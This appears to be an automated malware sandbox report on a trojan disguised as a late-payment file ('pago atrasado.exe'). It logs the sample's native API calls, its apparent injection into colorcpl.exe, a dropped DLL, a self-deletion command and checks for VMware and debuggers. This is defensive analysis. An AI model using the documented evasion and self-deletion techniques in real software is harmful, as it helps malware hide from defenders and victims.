          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04601D5516_2_04601D55
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453F90016_2_0453F900
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04530D2016_2_04530D20
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0455412016_2_04554120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0454D5E016_2_0454D5E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456258116_2_04562581
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04556E3016_2_04556E30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456EBB016_2_0456EBB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B1B8B616_2_02B1B8B6
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B1D0F516_2_02B1D0F5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B1C98516_2_02B1C985
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B1A6B616_2_02B1A6B6
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B02FB016_2_02B02FB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B08C7016_2_02B08C70
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B08C6B16_2_02B08C6B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B02D9016_2_02B02D90
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B1BD4516_2_02B1BD45
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 0453B150 appears 32 times
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: String function: 009CB150 appears 35 times
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_004185D0 NtCreateFile,1_2_004185D0
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00418680 NtReadFile,1_2_00418680
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00418700 NtClose,1_2_00418700
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_004187B0 NtAllocateVirtualMemory,1_2_004187B0
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_004185CA NtCreateFile,1_2_004185CA
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_0041867A NtReadFile,1_2_0041867A
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_004186FB NtClose,1_2_004186FB
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A098F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00A098F0
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00A09860
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09840 NtDelayExecution,LdrInitializeThunk,1_2_00A09840
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A099A0 NtCreateSection,LdrInitializeThunk,1_2_00A099A0
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00A09910
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09A20 NtResumeThread,LdrInitializeThunk,1_2_00A09A20
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00A09A00
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09A50 NtCreateFile,LdrInitializeThunk,1_2_00A09A50
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A095D0 NtClose,LdrInitializeThunk,1_2_00A095D0
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09540 NtReadFile,LdrInitializeThunk,1_2_00A09540
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A096E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00A096E0
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00A09660
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A097A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00A097A0
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09780 NtMapViewOfSection,LdrInitializeThunk,1_2_00A09780
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09FE0 NtCreateMutant,LdrInitializeThunk,1_2_00A09FE0
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09710 NtQueryInformationToken,LdrInitializeThunk,1_2_00A09710
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A098A0 NtWriteVirtualMemory,1_2_00A098A0
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09820 NtEnumerateKey,1_2_00A09820
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A0B040 NtSuspendThread,1_2_00A0B040
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A099D0 NtCreateProcessEx,1_2_00A099D0
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09950 NtQueueApcThread,1_2_00A09950
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09A80 NtOpenDirectoryObject,1_2_00A09A80
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09A10 NtQuerySection,1_2_00A09A10
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A0A3B0 NtGetContextThread,1_2_00A0A3B0
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09B00 NtSetValueKey,1_2_00A09B00
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A095F0 NtQueryInformationFile,1_2_00A095F0
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09520 NtWaitForSingleObject,1_2_00A09520
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A0AD30 NtSetContextThread,1_2_00A0AD30
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09560 NtWriteFile,1_2_00A09560
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A096D0 NtCreateKey,1_2_00A096D0
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09610 NtEnumerateValueKey,1_2_00A09610
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09670 NtQueryInformationProcess,1_2_00A09670
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09650 NtQueryValueKey,1_2_00A09650
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09730 NtQueryVirtualMemory,1_2_00A09730
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A0A710 NtOpenProcessToken,1_2_00A0A710
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09760 NtOpenProcess,1_2_00A09760
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09770 NtSetInformationFile,1_2_00A09770
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A0A770 NtOpenThread,1_2_00A0A770
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_1_004185D0 NtCreateFile,1_1_004185D0
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_1_00418680 NtReadFile,1_1_00418680
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_1_00418700 NtClose,1_1_00418700
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_1_004187B0 NtAllocateVirtualMemory,1_1_004187B0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579840 NtDelayExecution,LdrInitializeThunk,16_2_04579840
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579860 NtQuerySystemInformation,LdrInitializeThunk,16_2_04579860
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579540 NtReadFile,LdrInitializeThunk,16_2_04579540
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579910 NtAdjustPrivilegesToken,LdrInitializeThunk,16_2_04579910
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045795D0 NtClose,LdrInitializeThunk,16_2_045795D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045799A0 NtCreateSection,LdrInitializeThunk,16_2_045799A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579A50 NtCreateFile,LdrInitializeThunk,16_2_04579A50
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579650 NtQueryValueKey,LdrInitializeThunk,16_2_04579650
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579660 NtAllocateVirtualMemory,LdrInitializeThunk,16_2_04579660
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045796D0 NtCreateKey,LdrInitializeThunk,16_2_045796D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045796E0 NtFreeVirtualMemory,LdrInitializeThunk,16_2_045796E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579710 NtQueryInformationToken,LdrInitializeThunk,16_2_04579710
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579FE0 NtCreateMutant,LdrInitializeThunk,16_2_04579FE0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579780 NtMapViewOfSection,LdrInitializeThunk,16_2_04579780
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0457B040 NtSuspendThread,16_2_0457B040
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579820 NtEnumerateKey,16_2_04579820
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045798F0 NtReadVirtualMemory,16_2_045798F0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045798A0 NtWriteVirtualMemory,16_2_045798A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579950 NtQueueApcThread,16_2_04579950
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579560 NtWriteFile,16_2_04579560
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0457AD30 NtSetContextThread,16_2_0457AD30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579520 NtWaitForSingleObject,16_2_04579520
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045799D0 NtCreateProcessEx,16_2_045799D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045795F0 NtQueryInformationFile,16_2_045795F0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579670 NtQueryInformationProcess,16_2_04579670
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579610 NtEnumerateValueKey,16_2_04579610
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579A10 NtQuerySection,16_2_04579A10
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579A00 NtProtectVirtualMemory,16_2_04579A00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579A20 NtResumeThread,16_2_04579A20
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579A80 NtOpenDirectoryObject,16_2_04579A80
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579770 NtSetInformationFile,16_2_04579770
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0457A770 NtOpenThread,16_2_0457A770
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579760 NtOpenProcess,16_2_04579760
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0457A710 NtOpenProcessToken,16_2_0457A710
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579B00 NtSetValueKey,16_2_04579B00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579730 NtQueryVirtualMemory,16_2_04579730
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0457A3B0 NtGetContextThread,16_2_0457A3B0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045797A0 NtUnmapViewOfSection,16_2_045797A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B18680 NtReadFile,16_2_02B18680
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B187B0 NtAllocateVirtualMemory,16_2_02B187B0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B18700 NtClose,16_2_02B18700
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B185D0 NtCreateFile,16_2_02B185D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B186FB NtClose,16_2_02B186FB
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B1867A NtReadFile,16_2_02B1867A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B185CA NtCreateFile,16_2_02B185CA
          Source: pago atrasado.exe, 00000000.00000003.244765966.000000000F1B6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs pago atrasado.exe
          Source: pago atrasado.exe, 00000001.00000003.248962710.0000000000786000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs pago atrasado.exe
          Source: pago atrasado.exe, 00000001.00000002.327286991.0000000002973000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs pago atrasado.exe
          Source: C:\Users\user\Desktop\pago atrasado.exeFile read: C:\Users\user\Desktop\pago atrasado.exeJump to behavior
          Source: pago atrasado.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\pago atrasado.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\pago atrasado.exe 'C:\Users\user\Desktop\pago atrasado.exe'
          Source: C:\Users\user\Desktop\pago atrasado.exeProcess created: C:\Users\user\Desktop\pago atrasado.exe 'C:\Users\user\Desktop\pago atrasado.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\pago atrasado.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\pago atrasado.exeProcess created: C:\Users\user\Desktop\pago atrasado.exe 'C:\Users\user\Desktop\pago atrasado.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\pago atrasado.exe'Jump to behavior
          Source: C:\Users\user\Desktop\pago atrasado.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\pago atrasado.exeFile created: C:\Users\user\AppData\Local\Temp\nsb7E27.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/2@12/5
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,0_2_00402053
          Source: C:\Users\user\Desktop\pago atrasado.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404292
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5060:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Binary string: colorcpl.pdbGCTL source: pago atrasado.exe, 00000001.00000002.327276708.0000000002970000.00000040.00020000.sdmp
          Source: Binary string: colorcpl.pdb source: pago atrasado.exe, 00000001.00000002.327276708.0000000002970000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: pago atrasado.exe, 00000000.00000003.243423683.000000000F230000.00000004.00000001.sdmp, pago atrasado.exe, 00000001.00000003.248757919.0000000000670000.00000004.00000001.sdmp, colorcpl.exe, 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: pago atrasado.exe, colorcpl.exe

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\pago atrasado.exeUnpacked PE file: 1.2.pago atrasado.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_1000A4F5 push ecx; ret 0_2_1000A508
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_0041B87C push eax; ret 1_2_0041B882
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_0041B812 push eax; ret 1_2_0041B818
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_0041B81B push eax; ret 1_2_0041B882
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_0041C951 push FFFFFFA3h; ret 1_2_0041C955
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00404F18 push edi; retf 1_2_00404F19
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_0041B7C5 push eax; ret 1_2_0041B818
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A1D0D1 push ecx; ret 1_2_00A1D0E4
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_1_0041B87C push eax; ret 1_1_0041B882
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_1_0041B812 push eax; ret 1_1_0041B818
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_1_0041B81B push eax; ret 1_1_0041B882
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_1_0041C951 push FFFFFFA3h; ret 1_1_0041C955
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0458D0D1 push ecx; ret 16_2_0458D0E4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B1B812 push eax; ret 16_2_02B1B818
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B1B81B push eax; ret 16_2_02B1B882
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B1B87C push eax; ret 16_2_02B1B882
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B1C951 push FFFFFFA3h; ret 16_2_02B1C955
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B1B7C5 push eax; ret 16_2_02B1B818
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B04F18 push edi; retf 16_2_02B04F19
          Source: C:\Users\user\Desktop\pago atrasado.exeFile created: C:\Users\user\AppData\Local\Temp\nsw7E57.tmp\xpbpx.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: /c del 'C:\Users\user\Desktop\pago atrasado.exe'
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: /c del 'C:\Users\user\Desktop\pago atrasado.exe'Jump to behavior
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_10008826 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_10008826
          Source: C:\Users\user\Desktop\pago atrasado.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\pago atrasado.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\pago atrasado.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 0000000002B08604 second address: 0000000002B0860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 0000000002B0898E second address: 0000000002B08994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 5660Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exe TID: 5860Thread sleep time: -36000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_004088C0 rdtsc 1_2_004088C0
          Source: C:\Users\user\Desktop\pago atrasado.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_00405E93 FindFirstFileA,FindClose,0_2_00405E93
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004054BD
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_00402671 FindFirstFileA,0_2_00402671
          Source: explorer.exe, 00000002.00000000.275739014.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000002.00000000.312138109.000000000113D000.00000004.00000020.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.275739014.000000000891C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.312469410.00000000011B3000.00000004.00000020.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
          Source: explorer.exe, 00000002.00000000.312469410.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000002.00000000.275782564.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000002.00000000.315993694.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000002.00000000.275782564.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: explorer.exe, 00000002.00000000.290685274.0000000008BB0000.00000004.00000001.sdmpBinary or memory string: Prod_VMware_SATA*6
          Source: explorer.exe, 00000002.00000000.276079077.0000000008BB0000.00000004.00000001.sdmpBinary or memory string: AProd_VMware_SATA*6
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_1000CDA2 IsDebuggerPresent,0_2_1000CDA2
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_100093E8 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_100093E8
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_100098B2 GetProcessHeap,0_2_100098B2
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_004088C0 rdtsc 1_2_004088C0
          Source: C:\Users\user\Desktop\pago atrasado.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_1001A402 mov eax, dword ptr fs:[00000030h]0_2_1001A402
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_1001A616 mov eax, dword ptr fs:[00000030h]0_2_1001A616
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_1001A6C7 mov eax, dword ptr fs:[00000030h]0_2_1001A6C7
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_1001A706 mov eax, dword ptr fs:[00000030h]0_2_1001A706
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_1001A744 mov eax, dword ptr fs:[00000030h]0_2_1001A744
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A090AF mov eax, dword ptr fs:[00000030h]1_2_00A090AF
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C9080 mov eax, dword ptr fs:[00000030h]1_2_009C9080
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FF0BF mov ecx, dword ptr fs:[00000030h]1_2_009FF0BF
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FF0BF mov eax, dword ptr fs:[00000030h]1_2_009FF0BF
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FF0BF mov eax, dword ptr fs:[00000030h]1_2_009FF0BF
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A43884 mov eax, dword ptr fs:[00000030h]1_2_00A43884
